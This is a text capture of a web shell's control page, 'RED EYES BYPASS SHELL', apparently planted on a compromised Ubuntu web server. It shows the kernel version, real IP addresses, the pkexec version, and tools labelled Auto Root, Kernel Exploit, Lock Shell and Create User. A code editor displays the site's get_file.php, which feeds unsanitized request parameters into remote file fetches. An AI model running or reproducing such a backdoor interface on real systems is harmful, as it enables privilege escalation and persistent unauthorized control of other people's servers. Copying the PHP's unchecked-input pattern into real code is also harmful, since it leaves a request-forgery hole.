Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lcir /
static /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
get_file.php
635
B
-rwxr-xr-x
page.js
40.56
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_file.php
<?php //$siteID = "Admin"; $siteID = "lang_center"; $baseFileHost = "https://dev.arit.rru.ac.th/cms/"; $whitelist = array('172.21.0.1', "::1"); if(in_array($_SERVER['REMOTE_ADDR'], $whitelist)){ //echo $_SERVER['REMOTE_ADDR']; $baseFileHost = "http://localhost/cms/"; } $type = $_GET["ty"]; $id = $_GET["id"]; //$ref = $_GET["ref"]; if($type == 'html') $homepage = file_get_contents($baseFileHost . $siteID . "/page/" . $id . ".html?t=" . time()); if($type == 'js') $homepage = file_get_contents($baseFileHost . $siteID . "/" . $id . ".js?t=" . time()); echo $homepage; ?>
Close